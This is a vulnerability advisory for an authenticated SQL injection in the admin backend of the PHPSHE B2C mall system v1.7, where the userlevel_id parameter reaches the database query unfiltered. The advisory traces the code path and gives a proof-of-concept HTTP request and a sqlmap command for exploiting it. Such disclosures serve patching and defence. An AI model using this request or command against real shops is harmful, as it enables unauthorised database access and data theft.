Description
0x01 Vulnerability description
Test object:
(1) website: PHPSHE shopping system V1.7
(2) the website domain name: http://www.phpshe.com/
(3) IP address: http://www.phpshe.com/down/phpshe1.7.rar
(4) version: PHPSHE B2C mall system v1.7 (build 20180905 UTF8)
Vulnerability description:
Lingbao Jianhao network technology co., LTD. PHPSHE cms system background - SQL injection vulnerability.
0x02 Vulnerability details
The admin.php line 87 execution flow introduces the user.php
user.php Line 7 introduces user.hook.php
the user.hook.php line 155 pe_select function to user level adjustment
The pe_select function is defined on line 208 of ../include/class/db.class.php.
In the pe_select function, the value of the userlevel_id parameter has undergone a series of processing of the dowhere function, and finally directly spliced into the sql statement, there is no security filtering.
The code for the _dowhere function
0x03 POC
Vulnerability parameter userlevel_id
GET /phpshe1.7/admin.php?mod=user&userlevel_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=r3kqgf03cae7qguj1sjncb5apk
Upgrade-Insecure-Requests: 1
Vulnerability verification method:
python sqlmap.py -r 1.txt --batch -o --dbms=mysql --level 3 -p userlevel_id





